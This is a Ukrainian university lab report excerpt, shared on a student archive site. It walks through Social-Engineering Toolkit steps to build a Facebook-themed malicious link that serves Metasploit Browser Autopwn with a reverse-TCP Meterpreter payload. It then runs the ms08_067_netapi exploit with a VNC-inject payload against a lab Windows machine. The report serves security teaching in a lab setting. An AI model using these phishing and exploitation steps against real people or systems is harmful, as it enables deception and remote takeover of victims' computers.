Адміністрація вирішила продати даний сайт. За детальною інформацією звертайтесь за адресою: rozrahu@gmail.com

Соціал-інжиніринг Toolkit. Create Malicious Weblink, Install Virus, Capture Forensic Images

Інформація про навчальний заклад

ВУЗ:
Національний університет Львівська політехніка
Інститут:
ІКТА
Факультет:
ЗІ
Кафедра:
Кафедра захисту інформації

Інформація про роботу

Рік:
2014
Тип роботи:
Лабораторна робота
Предмет:
Методи та засоби захисту інформації
Варіант:
5

Частина тексту файла

МІНІСТЕРСТВО ОСВІТИ І НАУКИ УКРАЇНИ НАЦІОНАЛЬНИЙ УНІВЕРСИТЕТ ”ЛЬВІВСЬКА ПОЛІТЕХНІКА” ІКТА кафедра захисту інформації  ЗВІТ до лабораторної роботи № 5 з курсу «Методи та засоби захисту інформації в комп'ютерних мережах» на тему «Соціал-інжиніринг Toolkit. Create Malicious Weblink, Install Virus, Capture Forensic Images» МЕТА РОБОТИ: Створення шкідливого веб-посилання, віддаленого встановлення вірусу та копіювання образу диску. КОРОТКІ ТЕОРЕТИЧНІ ВІДОМОСТІ: Що таке Social-Engineering Toolkit (SET) The Social-Engineering Toolkit (SET) є пітон керований набір користувальницьких інструментів, які виключно зосереджені на тестування на проникнення людського атакуючого фактора. Його головна мета це збільшення і моделювання соціально-інженерної атаки і дозволяє тестувати і ефективно перевірити, які цільові атаки можуть бути розвинені. Social-Engineering toolkit доступні на backtrack like на backtrack 5, backbox, blackbuntu, Gnacktrack та на інших Linux збірках, які використовуються для тестування на проникнення.  Лабораторні примітки У цій лабораторній ми зробимо наступне: Використуємо набір для створення шкідливих Web-Link Створимо доповнення до VNC сесії Встановимо шкідливі віруси Захоплення судової пам'яті і образу жорсткого диска ХІД РОБОТИ: 1. Запуск Social Engineering ToolKit  Запуск Social Engineering ToolKit Інструкції: cd /pentest/exploits/set ./set Векторний сайт атаки Інструкції: Виберіть 2 3. Виберіть метод Metasploit Browser Attack Інструкції: Виберіть 2 4. Виберіть Web Templates Інструкції: Виберіть 1 5. Встановлення веб атаки на Facebook Інструкції: Виберіть 4 6. Введіть Exploit Інструкції: 24) Metasploit Browser Autopwn (Використовуйте на свій ризик!!!) 7. Встановіть Payload Інструкції: Виберіть 2) Windows Reverse_TCP Meterpreter Використовйте порт 5555 8. Підготовте проломи в роботі сервера Інструкції: Шукайте "--- Done, Found" перед продовженням. 2. Запуск WindowVulnerable01 і запуск Веб Браузера  Запуск Internet Explorer Інструкції: Start --> All Programs --> Internet Explorer Жертва натискає на посилання Інструкції: Помістіть шкідливе Web Link в адресну строку браузера В нашому випадку, http://192.168.1.105:8080 В вашому, візьміть ІР адресу з Частини 4, крок 8. Примітки: Веб браузер буде зломано. 3. Введення машини жертви  Запишіть ІР адресу жертви Інструкції: Запишіть ІР адресу жертви. Знайдіть рядок, що починається з Session ID 1 (Дивись нижче). Створення VNC Session на машині жертви Інструкції: use windows/smb/ms08_067_netapi set PAYLOAD windows/vncinject/bind_tcp set RHOST 192.168.1.109 Примітки: ІР адреса, отримана на попередньому рівні exploit Перегляд машини жертви по VNC Інструкції: Зараз ви маєте VNC підключення до машини жертви. Все добре!!! Захист лабораторної Інструкції №1: Клацніть на Metasploit Courtesy Shell date, введіть дату echo "Your Name" Заповніть рядок "Your Name" вашим іменем. наприклад, echo "John Gray" Заскрініть, PrtScn Вставте в документ Word  Запустіть Internet Explorer Інструкції: Start --> Internet Explorer Скачайте несправжній вірус. Інструкції: Вставте "http://www.computersecuritystudent.com/UNIX/BACKTRACK/lesson6/fake_virus.bat" в адресну строку. Нажміть Ентер Нажміть Зберегти Збережіть несправжній вірус. Інструкції: Йдіть до "C:\tools\Virus Jar" Створіть цю папку якщо її немає. Нажміть Save Запустіть несправжній вірус. Інструкції: Нажміть на кнопку Run Перегляд результатів Інструкції: Ви побачите декілька повідомлень про те, ваша система була скомпрометована. Зверніть увагу, що це всього лише пакетний сценарій, який виводить повідомлення на екран. Це був просто приклад того, що зловмисник може зробити, як тільки зєднається з віддаленим комп'ютером жертви. Натисніть на Black Box і натисніть Enter.. Видаліть fake_virus.bat file Інструкції: Start --> My Computer Йдіть до "C:\tools\Virus Jar" Нажміть праву кнопку мишки на fake_virus.bat Нажміть Delete Send to Recycle Bin? Yes Видаліть fake_virus.bat файл з кошика Інструкції: Йдіть до Recycle Bin (кошик...
Антиботан аватар за замовчуванням

25.05.2014 09:05

Коментарі

Ви не можете залишити коментар. Для цього, будь ласка, увійдіть або зареєструйтесь.

Завантаження файлу

Якщо Ви маєте на своєму комп'ютері файли, пов'язані з навчанням( розрахункові, лабораторні, практичні, контрольні роботи та інше...), і Вам не шкода ними поділитись - то скористайтесь формою для завантаження файлу, попередньо заархівувавши все в архів .rar або .zip розміром до 100мб, і до нього невдовзі отримають доступ студенти всієї України! Ви отримаєте грошову винагороду в кінці місяця, якщо станете одним з трьох переможців!
Стань активним учасником руху antibotan!
Поділись актуальною інформацією,
і отримай привілеї у користуванні архівом! Детальніше

Оголошення від адміністратора

Антиботан аватар за замовчуванням

пропонує роботу

Admin

26.02.2019 12:38

Привіт усім учасникам нашого порталу! Хороші новини - з‘явилась можливість кожному заробити на своїх знаннях та вміннях. Тепер Ви можете продавати свої роботи на сайті заробляючи кошти, рейтинг і довіру користувачів. Потрібно завантажити роботу, вказати ціну і додати один інформативний скріншот з деякими частинами виконаних завдань. Навіть одна якісна і всім необхідна робота може продатися сотні разів. «Головою заробляти» продуктивніше ніж руками! :-)

Новини